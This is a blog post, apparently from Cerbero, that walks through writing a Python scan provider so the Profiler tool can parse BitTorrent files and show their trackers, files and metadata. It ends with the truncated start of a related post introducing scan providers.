Following our recent introduction to Scan Providers, here’s a first implementation example. In this post we’ll see how to add support for Torrent files in Profiler. Of course, the implementation shown in this post will be available in the upcoming 2.5.0 release.

Let’s start by creating an entry in the configuration file:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
[Torrent]
label = BitTorrent File
group = db
file = Torrent.py
allocator = torrentAllocator
[Torrent] label = BitTorrent File group = db file = Torrent.py allocator = torrentAllocator
[Torrent]
label = BitTorrent File
group = db
file = Torrent.py
allocator = torrentAllocator

For the automatic signature recognition we may rely on a simple one:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
rule torrent
{
strings:
$sig = "d8:announce"
condition:
$sig at 0
}
rule torrent { strings: $sig = "d8:announce" condition: $sig at 0 }
rule torrent
{
    strings:
        $sig = "d8:announce"

    condition:
        $sig at 0
}

Torrent files are encoded dictionaries and they usually start with the announce item. There’s no guarantee for that, but for now this simple matching should be good enough.

The encoded dictionary is in the Beconde format. Fortunately, someone already wrote the Python code to decode it:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
#
# BEGIN OF 3RD PARTY CODE (adapted to work with Python 3)
#
# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
# Written by Petru Paler
def decode_int(x, f):
f += 1
newf = x.index(0x65, f)
n = int(x[f:newf])
if x[f] == 0x2D: # -
if x[f + 1] == 0x30:
raise ValueError
elif x[f] == 0x30 and newf != f+1:
raise ValueError
return (n, newf+1)
def decode_string(x, f):
colon = x.index(0x3A, f) # :
n = int(x[f:colon])
if x[f] == 0x30 and colon != f+1:
raise ValueError
colon += 1
return (x[colon:colon+n], colon+n)
def decode_list(x, f):
r, f = [], f+1
while x[f] != 0x65: # e
v, f = decode_func[x[f]](x, f)
r.append(v)
return (r, f + 1)
def decode_dict(x, f):
r, f = {}, f+1
while x[f] != 0x65: # e
k, f = decode_string(x, f)
r[k], f = decode_func[x[f]](x, f)
return (r, f + 1)
decode_func = {}
decode_func[0x6C] = decode_list # l
decode_func[0x64] = decode_dict # d
decode_func[0x69] = decode_int # i
decode_func[0x30] = decode_string
decode_func[0x31] = decode_string
decode_func[0x32] = decode_string
decode_func[0x33] = decode_string
decode_func[0x34] = decode_string
decode_func[0x35] = decode_string
decode_func[0x36] = decode_string
decode_func[0x37] = decode_string
decode_func[0x38] = decode_string
decode_func[0x39] = decode_string
def bdecode(x):
try:
r, l = decode_func[x[0]](x, 0)
except (IndexError, KeyError, ValueError):
return {}
if l != len(x):
return {}
return r
#
# END OF 3RD PARTY CODE
#
# # BEGIN OF 3RD PARTY CODE (adapted to work with Python 3) # # The contents of this file are subject to the BitTorrent Open Source License # Version 1.1 (the License). You may not copy or use this file, in either # source code or executable form, except in compliance with the License. You # may obtain a copy of the License at http://www.bittorrent.com/license/. # # Software distributed under the License is distributed on an AS IS basis, # WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License # for the specific language governing rights and limitations under the # License. # Written by Petru Paler def decode_int(x, f): f += 1 newf = x.index(0x65, f) n = int(x[f:newf]) if x[f] == 0x2D: # - if x[f + 1] == 0x30: raise ValueError elif x[f] == 0x30 and newf != f+1: raise ValueError return (n, newf+1) def decode_string(x, f): colon = x.index(0x3A, f) # : n = int(x[f:colon]) if x[f] == 0x30 and colon != f+1: raise ValueError colon += 1 return (x[colon:colon+n], colon+n) def decode_list(x, f): r, f = [], f+1 while x[f] != 0x65: # e v, f = decode_func[x[f]](x, f) r.append(v) return (r, f + 1) def decode_dict(x, f): r, f = {}, f+1 while x[f] != 0x65: # e k, f = decode_string(x, f) r[k], f = decode_func[x[f]](x, f) return (r, f + 1) decode_func = {} decode_func[0x6C] = decode_list # l decode_func[0x64] = decode_dict # d decode_func[0x69] = decode_int # i decode_func[0x30] = decode_string decode_func[0x31] = decode_string decode_func[0x32] = decode_string decode_func[0x33] = decode_string decode_func[0x34] = decode_string decode_func[0x35] = decode_string decode_func[0x36] = decode_string decode_func[0x37] = decode_string decode_func[0x38] = decode_string decode_func[0x39] = decode_string def bdecode(x): try: r, l = decode_func[x[0]](x, 0) except (IndexError, KeyError, ValueError): return {} if l != len(x): return {} return r # # END OF 3RD PARTY CODE #
#
# BEGIN OF 3RD PARTY CODE (adapted to work with Python 3)
#
# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License).  You may not copy or use this file, in either
# source code or executable form, except in compliance with the License.  You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied.  See the License
# for the specific language governing rights and limitations under the
# License.

# Written by Petru Paler

def decode_int(x, f):
    f += 1
    newf = x.index(0x65, f)
    n = int(x[f:newf])
    if x[f] == 0x2D: # -
        if x[f + 1] == 0x30:
            raise ValueError
    elif x[f] == 0x30 and newf != f+1:
        raise ValueError
    return (n, newf+1)

def decode_string(x, f):
    colon = x.index(0x3A, f) # :
    n = int(x[f:colon])
    if x[f] == 0x30 and colon != f+1:
        raise ValueError
    colon += 1
    return (x[colon:colon+n], colon+n)

def decode_list(x, f):
    r, f = [], f+1
    while x[f] != 0x65: # e
        v, f = decode_func[x[f]](x, f)
        r.append(v)
    return (r, f + 1)

def decode_dict(x, f):
    r, f = {}, f+1
    while x[f] != 0x65: # e
        k, f = decode_string(x, f)
        r[k], f = decode_func[x[f]](x, f)
    return (r, f + 1)

decode_func = {}
decode_func[0x6C] = decode_list # l
decode_func[0x64] = decode_dict # d
decode_func[0x69] = decode_int  # i
decode_func[0x30] = decode_string
decode_func[0x31] = decode_string
decode_func[0x32] = decode_string
decode_func[0x33] = decode_string
decode_func[0x34] = decode_string
decode_func[0x35] = decode_string
decode_func[0x36] = decode_string
decode_func[0x37] = decode_string
decode_func[0x38] = decode_string
decode_func[0x39] = decode_string

def bdecode(x):
    try:
        r, l = decode_func[x[0]](x, 0)
    except (IndexError, KeyError, ValueError):
        return {}
    if l != len(x):
        return {}
    return r
    
#
# END OF 3RD PARTY CODE
#

We can now load the file and decode its dictionary:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
class TorrentObject(CFFObject):
def __init__(self):
super(TorrentObject, self).__init__()
self.SetObjectFormatName("TORRENT")
self.SetDefaultEndianness(ENDIANNESS_LITTLE)
self.tdict = None
def GetDictionary(self):
if self.tdict == None:
size = min(self.GetSize(), MAX_TORRENT_SIZE)
data = self.Read(0, size)
self.tdict = bdecode(bytes(data))
return self.tdict
class TorrentScanProvider(ScanProvider):
def __init__(self):
super(TorrentScanProvider, self).__init__()
self.obj = None
# ....
def _clear(self):
self.obj = None
def _getObject(self):
return self.obj
def _initObject(self):
self.obj = TorrentObject()
self.obj.Load(self.getStream())
d = self.obj.GetDictionary()
return self.SCAN_RESULT_OK if len(d) != 0 else self.SCAN_RESULT_ERROR
class TorrentObject(CFFObject): def __init__(self): super(TorrentObject, self).__init__() self.SetObjectFormatName("TORRENT") self.SetDefaultEndianness(ENDIANNESS_LITTLE) self.tdict = None def GetDictionary(self): if self.tdict == None: size = min(self.GetSize(), MAX_TORRENT_SIZE) data = self.Read(0, size) self.tdict = bdecode(bytes(data)) return self.tdict class TorrentScanProvider(ScanProvider): def __init__(self): super(TorrentScanProvider, self).__init__() self.obj = None # .... def _clear(self): self.obj = None def _getObject(self): return self.obj def _initObject(self): self.obj = TorrentObject() self.obj.Load(self.getStream()) d = self.obj.GetDictionary() return self.SCAN_RESULT_OK if len(d) != 0 else self.SCAN_RESULT_ERROR
class TorrentObject(CFFObject):

    def __init__(self):
        super(TorrentObject, self).__init__()
        self.SetObjectFormatName("TORRENT")
        self.SetDefaultEndianness(ENDIANNESS_LITTLE)
        self.tdict = None
        
    def GetDictionary(self):
        if self.tdict == None:
            size = min(self.GetSize(), MAX_TORRENT_SIZE)
            data = self.Read(0, size)
            self.tdict = bdecode(bytes(data))
        return self.tdict

class TorrentScanProvider(ScanProvider):

    def __init__(self):
        super(TorrentScanProvider, self).__init__()
        self.obj = None
        
        # ....

    def _clear(self):
        self.obj = None

    def _getObject(self):
        return self.obj

    def _initObject(self):
        self.obj = TorrentObject()
        self.obj.Load(self.getStream())
        d = self.obj.GetDictionary()
        return self.SCAN_RESULT_OK if len(d) != 0 else self.SCAN_RESULT_ERROR

We call the GetDictionary method first time in the _initObject method, so that the parsing occurs when we’re in another thread and we don’t stall the UI.

Let’s display the parsed dictionary to the user:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
def _getFormat(self):
ft = FormatTree()
ft.enableIDs(True)
fi = ft.appendChild(None, self.FormatItem_Dictionary)
return ft
def _formatViewInfo(self, finfo):
if finfo.fid >= 1 or finfo.fid - 1 < len(self.fi_names):
finfo.text = self.fi_names[finfo.fid - 1]
return True
return False
def _formatViewData(self, sdata):
if sdata.fid == self.FormatItem_Dictionary:
sdata.setViews(SCANVIEW_TEXT)
txt = pprint.pformat(self.obj.GetDictionary())
sdata.data.setData(txt)
return True
return False
def _getFormat(self): ft = FormatTree() ft.enableIDs(True) fi = ft.appendChild(None, self.FormatItem_Dictionary) return ft def _formatViewInfo(self, finfo): if finfo.fid >= 1 or finfo.fid - 1 < len(self.fi_names): finfo.text = self.fi_names[finfo.fid - 1] return True return False def _formatViewData(self, sdata): if sdata.fid == self.FormatItem_Dictionary: sdata.setViews(SCANVIEW_TEXT) txt = pprint.pformat(self.obj.GetDictionary()) sdata.data.setData(txt) return True return False
    def _getFormat(self):
        ft = FormatTree()
        ft.enableIDs(True)
        fi = ft.appendChild(None, self.FormatItem_Dictionary)
        return ft
        
    def _formatViewInfo(self, finfo):
        if finfo.fid >= 1 or finfo.fid - 1 < len(self.fi_names):
            finfo.text = self.fi_names[finfo.fid - 1]
            return True
        return False

    def _formatViewData(self, sdata):
        if sdata.fid == self.FormatItem_Dictionary:
            sdata.setViews(SCANVIEW_TEXT)
            txt = pprint.pformat(self.obj.GetDictionary())
            sdata.data.setData(txt)
            return True
        return False

Dictionary

This is the description extracted from Wikipedia of some of the keys:

  • announce—the URL of the tracker
  • info—this maps to a dictionary whose keys are dependent on whether one or more files are being shared:
    • name—suggested filename where the file is to be saved (if one file)/suggested directory name where the files are to be saved (if multiple files)
    • piece length—number of bytes per piece. This is commonly 28 KiB = 256 KiB = 262,144 B.
    • pieces—a hash list, i.e., a concatenation of each piece's SHA-1 hash. As SHA-1 returns a 160-bit hash, pieces will be a string whose length is a multiple of 160-bits.
    • length—size of the file in bytes (only when one file is being shared)
    • files—a list of dictionaries each corresponding to a file (only when multiple files are being shared). Each dictionary has the following keys:
      • path—a list of strings corresponding to subdirectory names, the last of which is the actual file name
      • length—size of the file in bytes.

While the dictionary already could suffice to extract all the information the user needs, we may want to present parts of the dictionary in an easier way to read.

First, we'd like to show to the user some meta-data information, which may be contained in the dictionary. To do that, we add a meta-data scan entry:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
def _startScan(self):
d = self.obj.GetDictionary()
if any(mk in d for mk in self.meta_keys):
e = ScanEntryData()
e.category = SEC_Privacy
e.type = CT_MetaData
self.addEntry(e)
if self.obj.GetSize() > MAX_TORRENT_SIZE:
e = ScanEntryData()
e.category = SEC_Warn
e.type = CT_UnaccountedSpace
self.addEntry(e)
return self.SCAN_RESULT_FINISHED
def _startScan(self): d = self.obj.GetDictionary() if any(mk in d for mk in self.meta_keys): e = ScanEntryData() e.category = SEC_Privacy e.type = CT_MetaData self.addEntry(e) if self.obj.GetSize() > MAX_TORRENT_SIZE: e = ScanEntryData() e.category = SEC_Warn e.type = CT_UnaccountedSpace self.addEntry(e) return self.SCAN_RESULT_FINISHED
    def _startScan(self):
        d = self.obj.GetDictionary()
        if any(mk in d for mk in self.meta_keys):
            e = ScanEntryData()
            e.category = SEC_Privacy
            e.type = CT_MetaData
            self.addEntry(e)
        if self.obj.GetSize() > MAX_TORRENT_SIZE:
            e = ScanEntryData()
            e.category = SEC_Warn
            e.type = CT_UnaccountedSpace
            self.addEntry(e)
        return self.SCAN_RESULT_FINISHED

We also warn the user if the file exceeds the allowed maximum. We perform the whole scan logic in the UI thread, since we're not doing any CPU intensive operation and thus we return SCAN_RESULT_FINISHED, which causes the _threadScan method not be called.

Here we return the meta-data to the UI:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
def _scanViewData(self, xml, dnode, sdata):
if sdata.type == CT_MetaData:
d = self.obj.GetDictionary()
out = proTextStream()
for mk in self.meta_keys:
if mk in d:
tmk = mk.decode("utf-8", errors="ignore")
if tmk == "creation date":
dt = self.obj.CreationDate()
tmv = dt.toString() if dt.isValid() else "?"
else:
tmv = d[mk].decode("utf-8", errors="ignore")
out._print(tmk)
out._print(": ")
out._print(tmv)
out.nl()
sdata.setViews(SCANVIEW_TEXT)
sdata.data.setData(out.buffer)
return True
def _scanViewData(self, xml, dnode, sdata): if sdata.type == CT_MetaData: d = self.obj.GetDictionary() out = proTextStream() for mk in self.meta_keys: if mk in d: tmk = mk.decode("utf-8", errors="ignore") if tmk == "creation date": dt = self.obj.CreationDate() tmv = dt.toString() if dt.isValid() else "?" else: tmv = d[mk].decode("utf-8", errors="ignore") out._print(tmk) out._print(": ") out._print(tmv) out.nl() sdata.setViews(SCANVIEW_TEXT) sdata.data.setData(out.buffer) return True
    def _scanViewData(self, xml, dnode, sdata):
        if sdata.type == CT_MetaData:
            d = self.obj.GetDictionary()
            out = proTextStream()
            for mk in self.meta_keys:
                if mk in d:
                    tmk = mk.decode("utf-8", errors="ignore")
                    if tmk == "creation date":
                        dt = self.obj.CreationDate()
                        tmv = dt.toString() if dt.isValid() else "?"
                    else:
                        tmv = d[mk].decode("utf-8", errors="ignore")
                    out._print(tmk)
                    out._print(": ")
                    out._print(tmv)
                    out.nl()
            sdata.setViews(SCANVIEW_TEXT)
            sdata.data.setData(out.buffer)
            return True

MetaData

Also it would be convenient to see the list of trackers and files. Let's start with the trackers:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
class TorrentObject(CFFObject):
# ...
def GetTrackers(self):
d = self.GetDictionary()
trackers = []
dup = set()
if b"announce" in d and type(d[b"announce"]) is bytes:
trackers.append(d[b"announce"])
dup.add(trackers[0])
if b"announce-list" in d:
al = d[b"announce-list"]
for a in al:
if type(a) is list and len(a) > 0 and a[0] not in dup and type(a[0]) is bytes:
trackers.append(a[0])
dup.add(a[0])
return trackers
def trackersViewCb(cv, trackers, code, view, data):
if code == pvnInit:
tv = cv.getView(1)
tv.setColumnCount(1)
labels = NTStringList()
labels.append("Tracker")
tv.setColumnLabels(labels)
tv.setColumnCWidth(0, 70)
tv.setRowCount(len(trackers))
return 1
elif code == pvnGetTableRow:
if view.id() == 1:
data.setText(0, trackers[data.row].decode("utf-8", errors="ignore"))
return 0
class TorrentScanProvider(ScanProvider):
# ...
def _formatViewData(self, sdata):
# ...
elif sdata.fid == self.FormatItem_Trackers:
sdata.setViews(SCANVIEW_CUSTOM)
sdata.data.setData("<ui><hl margin="0">")
sdata.setCallback(trackersViewCb, self.obj.GetTrackers())
return True
return False<p><a href="/wp-content/uploads/2015/09/torrent/trackers.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/torrent/trackers.png" alt="Trackers"></a></p><p>When retrieving data from the dictionary, we also make sure that it is in the correct type, so that the code which handles this data won't end up generating an exception when trying to process an unexpected type.</p><p>And now the files:</p><pre lang="python">class TorrentObject(CFFObject):
# ...
def GetFiles(self):
d = self.GetDictionary()
if not b"info" in d:
return []
d = d[b"info"]
if not type(d) is dict:
return []
files = []
if not b"files" in d:
if b"name" in d and type(d[b"name"]) is bytes:
sz = d.get(b"length", 0)
files.append((d[b"name"], sz if type(sz) is int else 0))
else:
flist = d[b"files"]
if not type(flist) is list:
return []
for fd in flist:
if type(fd) is dict:
if b"path" in fd:
pt = fd[b"path"]
if type(pt) is list and len(pt) > 0 and type(pt[0]) is bytes:
sz = fd.get(b"length", 0)
files.append((pt[0], sz if type(sz) is int else 0))
return files
def filesViewCb(cv, files, code, view, data):
if code == pvnInit:
tv = cv.getView(1)
tv.setColumnCount(2)
labels = NTStringList()
labels.append("Name")
labels.append("Size")
tv.setColumnLabels(labels)
tv.setColumnCWidth(0, 70)
tv.setColumnCWidth(1, 35)
tv.setRowCount(len(files))
return 1
elif code == pvnGetTableRow:
if view.id() == 1:
data.setText(0, files[data.row][0].decode("utf-8", errors="ignore"))
sz = files[data.row][1]
data.setText(1, "%.02f MBs (%d bytes)" % (sz / 0x100000, sz))
return 0
class TorrentScanProvider(ScanProvider):
# ...
def _formatViewData(self, sdata):
# ...
elif sdata.fid == self.FormatItem_Files:
sdata.setViews(SCANVIEW_CUSTOM)
sdata.data.setData("<ui><hl margin="0"></hl></ui></pre><table id="1"> </table>")
sdata.setCallback(filesViewCb, self.obj.GetFiles())
return True
return False<p><a href="/wp-content/uploads/2015/09/torrent/files.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/torrent/files.png" alt="Files"></a></p><p>And that's it. Now again the whole code for a better overview:</p><pre lang="python">from Pro.Core import *
from Pro.UI import pvnInit, pvnGetTableRow
import pprint
MAX_TORRENT_SIZE = 10485760 # 10 MBs
#
# BEGIN OF 3RD PARTY CODE (adapted to work with Python 3)
#
# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
# Written by Petru Paler
def decode_int(x, f):
f += 1
newf = x.index(0x65, f)
n = int(x[f:newf])
if x[f] == 0x2D: # -
if x[f + 1] == 0x30:
raise ValueError
elif x[f] == 0x30 and newf != f+1:
raise ValueError
return (n, newf+1)
def decode_string(x, f):
colon = x.index(0x3A, f) # :
n = int(x[f:colon])
if x[f] == 0x30 and colon != f+1:
raise ValueError
colon += 1
return (x[colon:colon+n], colon+n)
def decode_list(x, f):
r, f = [], f+1
while x[f] != 0x65: # e
v, f = decode_func[x[f]](x, f)
r.append(v)
return (r, f + 1)
def decode_dict(x, f):
r, f = {}, f+1
while x[f] != 0x65: # e
k, f = decode_string(x, f)
r[k], f = decode_func[x[f]](x, f)
return (r, f + 1)
decode_func = {}
decode_func[0x6C] = decode_list # l
decode_func[0x64] = decode_dict # d
decode_func[0x69] = decode_int # i
decode_func[0x30] = decode_string
decode_func[0x31] = decode_string
decode_func[0x32] = decode_string
decode_func[0x33] = decode_string
decode_func[0x34] = decode_string
decode_func[0x35] = decode_string
decode_func[0x36] = decode_string
decode_func[0x37] = decode_string
decode_func[0x38] = decode_string
decode_func[0x39] = decode_string
def bdecode(x):
try:
r, l = decode_func[x[0]](x, 0)
except (IndexError, KeyError, ValueError):
return {}
if l != len(x):
return {}
return r
#
# END OF 3RD PARTY CODE
#
class TorrentObject(CFFObject):
def __init__(self):
super(TorrentObject, self).__init__()
self.SetObjectFormatName("TORRENT")
self.SetDefaultEndianness(ENDIANNESS_LITTLE)
self.tdict = None
def GetDictionary(self):
if self.tdict == None:
size = min(self.GetSize(), MAX_TORRENT_SIZE)
data = self.Read(0, size)
self.tdict = bdecode(bytes(data))
return self.tdict
def CreationDate(self):
d = self.GetDictionary()
cd = d.get(b"creation date", None)
if cd == None or not type(cd) is int:
return NTDateTime()
return NTDateTime.fromMSecsSinceEpoch(cd * 1000)
def GetTrackers(self):
d = self.GetDictionary()
trackers = []
dup = set()
if b"announce" in d and type(d[b"announce"]) is bytes:
trackers.append(d[b"announce"])
dup.add(trackers[0])
if b"announce-list" in d:
al = d[b"announce-list"]
for a in al:
if type(a) is list and len(a) > 0 and a[0] not in dup and type(a[0]) is bytes:
trackers.append(a[0])
dup.add(a[0])
return trackers
def GetFiles(self):
d = self.GetDictionary()
if not b"info" in d:
return []
d = d[b"info"]
if not type(d) is dict:
return []
files = []
if not b"files" in d:
if b"name" in d and type(d[b"name"]) is bytes:
sz = d.get(b"length", 0)
files.append((d[b"name"], sz if type(sz) is int else 0))
else:
flist = d[b"files"]
if not type(flist) is list:
return []
for fd in flist:
if type(fd) is dict:
if b"path" in fd:
pt = fd[b"path"]
if type(pt) is list and len(pt) > 0 and type(pt[0]) is bytes:
sz = fd.get(b"length", 0)
files.append((pt[0], sz if type(sz) is int else 0))
return files
def trackersViewCb(cv, trackers, code, view, data):
if code == pvnInit:
tv = cv.getView(1)
tv.setColumnCount(1)
labels = NTStringList()
labels.append("Tracker")
tv.setColumnLabels(labels)
tv.setColumnCWidth(0, 70)
tv.setRowCount(len(trackers))
return 1
elif code == pvnGetTableRow:
if view.id() == 1:
data.setText(0, trackers[data.row].decode("utf-8", errors="ignore"))
return 0
def filesViewCb(cv, files, code, view, data):
if code == pvnInit:
tv = cv.getView(1)
tv.setColumnCount(2)
labels = NTStringList()
labels.append("Name")
labels.append("Size")
tv.setColumnLabels(labels)
tv.setColumnCWidth(0, 70)
tv.setColumnCWidth(1, 35)
tv.setRowCount(len(files))
return 1
elif code == pvnGetTableRow:
if view.id() == 1:
data.setText(0, files[data.row][0].decode("utf-8", errors="ignore"))
sz = files[data.row][1]
data.setText(1, "%.02f MBs (%d bytes)" % (sz / 0x100000, sz))
return 0
class TorrentScanProvider(ScanProvider):
def __init__(self):
super(TorrentScanProvider, self).__init__()
self.obj = None
self.meta_keys = [b"created by", b"creation date", b"comment"]
# format item IDs
self.FormatItem_Dictionary = 1
self.FormatItem_Trackers = 2
self.FormatItem_Files = 3
# format item names
self.fi_names = ["Dictionary", "Trackers", "Files"]
def _clear(self):
self.obj = None
def _getObject(self):
return self.obj
def _initObject(self):
self.obj = TorrentObject()
self.obj.Load(self.getStream())
d = self.obj.GetDictionary()
return self.SCAN_RESULT_OK if len(d) != 0 else self.SCAN_RESULT_ERROR
def _startScan(self):
d = self.obj.GetDictionary()
if any(mk in d for mk in self.meta_keys):
e = ScanEntryData()
e.category = SEC_Privacy
e.type = CT_MetaData
self.addEntry(e)
if self.obj.GetSize() > MAX_TORRENT_SIZE:
e = ScanEntryData()
e.category = SEC_Warn
e.type = CT_UnaccountedSpace
self.addEntry(e)
return self.SCAN_RESULT_FINISHED
def _scanViewData(self, xml, dnode, sdata):
if sdata.type == CT_MetaData:
d = self.obj.GetDictionary()
out = proTextStream()
for mk in self.meta_keys:
if mk in d:
tmk = mk.decode("utf-8", errors="ignore")
if tmk == "creation date":
dt = self.obj.CreationDate()
tmv = dt.toString() if dt.isValid() else "?"
else:
tmv = d[mk].decode("utf-8", errors="ignore")
out._print(tmk)
out._print(": ")
out._print(tmv)
out.nl()
sdata.setViews(SCANVIEW_TEXT)
sdata.data.setData(out.buffer)
return True
elif sdata.type == CT_UnaccountedSpace:
sdata.setViews(SCANVIEW_TEXT)
sdata.data.setData("The file size exceeds the maximum allowed one of %d bytes!" % (MAX_TORRENT_SIZE,))
return True
return False
def _getFormat(self):
ft = FormatTree()
ft.enableIDs(True)
fi = ft.appendChild(None, self.FormatItem_Dictionary)
ft.appendChild(fi, self.FormatItem_Trackers)
ft.appendChild(fi, self.FormatItem_Files)
return ft
def _formatViewInfo(self, finfo):
if finfo.fid >= 1 or finfo.fid - 1 < len(self.fi_names):
finfo.text = self.fi_names[finfo.fid - 1]
return True
return False
def _formatViewData(self, sdata):
if sdata.fid == self.FormatItem_Dictionary:
sdata.setViews(SCANVIEW_TEXT)
txt = pprint.pformat(self.obj.GetDictionary())
sdata.data.setData(txt)
return True
elif sdata.fid == self.FormatItem_Trackers:
sdata.setViews(SCANVIEW_CUSTOM)
sdata.data.setData("<ui><hl margin="0"></hl></ui></pre><table id="1"> </table>")
sdata.setCallback(trackersViewCb, self.obj.GetTrackers())
return True
elif sdata.fid == self.FormatItem_Files:
sdata.setViews(SCANVIEW_CUSTOM)
sdata.data.setData("<ui><hl margin="0"></hl></ui><table id="1"></table>")
sdata.setCallback(filesViewCb, self.obj.GetFiles())
return True
return False
def torrentAllocator():
return TorrentScanProvider()<p>We could still extract more information from the torrent file. For instance, we could show the list of hashes and to which portion of which file they belong to. If that's interesting for forensic purposes, we can easily add this view in the future.</p><footer class="entry-footer">
<span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/torrent-support/" rel="bookmark"><time class="entry-date published" datetime="2015-09-23T16:50:31+00:00">September 23, 2015</time><time class="updated" datetime="2021-04-01T16:32:00+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/forensics/" rel="category tag">Forensics</a>, <a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/p2p/" rel="tag">P2P</a>, <a href="https://blog.cerbero.io/tag/torrent/" rel="tag">Torrent</a>, <a href="https://blog.cerbero.io/tag/trackers/" rel="tag">Trackers</a></span><span class="comments-link"><a href="https://blog.cerbero.io/torrent-support/#respond">Leave a comment<span class="screen-reader-text"> on Torrent Support</span></a></span> </footer><article id="post-1551" class="post-1551 post type-post status-publish format-standard hentry category-suite-standard">
<header class="entry-header">
<h2 class="entry-title"><a href="https://blog.cerbero.io/scan-providers/" rel="bookmark">Scan Providers</a></h2> </header>
<div class="entry-content"> <p>Version 2.5.0 is close to being released and comes with the last type of extension exposed to Python: scan providers. Scan providers extensions are not only the most complex type of extensions, but also the most powerful ones as they allow to add support for new file formats entirely from Python! </p> <p>This feature required exposing a lot more of the SDK to Python and can’t be completely discussed in one post. This post is going to introduce the topic, while future posts will show real life examples.</p> <p>Let’s start from the list of Python scan providers under Extensions -> Scan providers:</p> <p><a href="/wp-content/uploads/2015/09/scanp/extlist.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/scanp/extlist.png" alt="Scan provider extensions"></a></p> <p>This list is retrieved from the configuration file ‘scanp.cfg’. Here’s an example entry:</p> <pre lang="ini">[TEST]
label = Test scan provider
ext = test2,test3
group = db
file = Test.py
allocator = allocator</pre> <p>The name of the section has two purposes: it specifies the name of the format being supported (in this case ‘TEST’) and also the name of the extension, which automatically is associated to that format (in this case ‘.test’, case insensitive). The hard limit for format names is 9 characters for now, this may change in the future if more are needed. The <strong>label</strong> is the description. The <strong>ext</strong> parameter is optional and specifies additional extensions to be associated to the format. <strong>group</strong> specifies the type of file which is being supported; available groups are: img, video, audio, doc, font, exe, manexe, arch, db, sys, cert, script. <strong>file</strong> specifies the Python source file and <strong>allocator</strong> the function which returns a new instance of the scan provider class.</p> <p>Let’s start with the allocator:</p> <pre lang="python">def allocator():
return TestScanProvider()</pre> <p>It just returns a new instance of <strong>TestScanProvider</strong>, which is a class dervided from <strong>ScanProvider</strong>:</p> <pre lang="python">class TestScanProvider(ScanProvider):
def __init__(self):
super(TestScanProvider, self).__init__()
self.obj = None</pre> <p>Every scan provider has some mandatory methods it must override, let’s begin with the first ones:</p> <pre lang="python"> def _clear(self):
self.obj = None
def _getObject(self):
return self.obj
def _initObject(self):
self.obj = TestObject()
self.obj.Load(self.getStream())
return self.SCAN_RESULT_OK</pre> <p><strong>_clear</strong> gives a chance to free internal resources when they’re no longer used. In Python this is not usually important as member objects will automatically be freed when their reference count reaches zero.</p> <p><strong>_getObject</strong> must return the internal instance of the object being parsed. This must return an instance of a <strong>CFFObject</strong> derived class.</p> <p><strong>_initObject</strong> creates the object instance and loads the data stream into it. In the sample above we assume it being successful. Otherwise, we would have to return <strong>SCAN_RESULT_ERROR</strong>. This method is not called by the main thread, so that it doesn’t block the UI during long parse operations.</p> <p>Let’s take a look at the <strong>TestObject</strong> class:</p> <pre lang="python">class TestObject(CFFObject):
def __init__(self):
super(TestObject, self).__init__()
self.SetObjectFormatName("TEST")
self.SetDefaultEndianness(ENDIANNESS_LITTLE)</pre> <p>This is a minimalistic implementation of a <strong>CFFObject</strong> derived class. Usually it should contain at least an override of the <strong>CustomLoad</strong> method, which gives the opportunity to fail when the data stream is first loaded through the <strong>Load</strong> method. <strong>SetDefaultEndianness</strong> wouldn’t even be necessary, as every object defaults to little endian by default. <strong>SetObjectFormatName</strong>, on the other hand, is very important, as it sets the internal format name of the object.</p> <p>Let’s now take a look at how we scan a file:</p> <pre lang="python"> def _startScan(self):
return self.SCAN_RESULT_OK
def _threadScan(self):
e = ScanEntryData()
e.category = SEC_Warn
e.type = CT_NativeCode
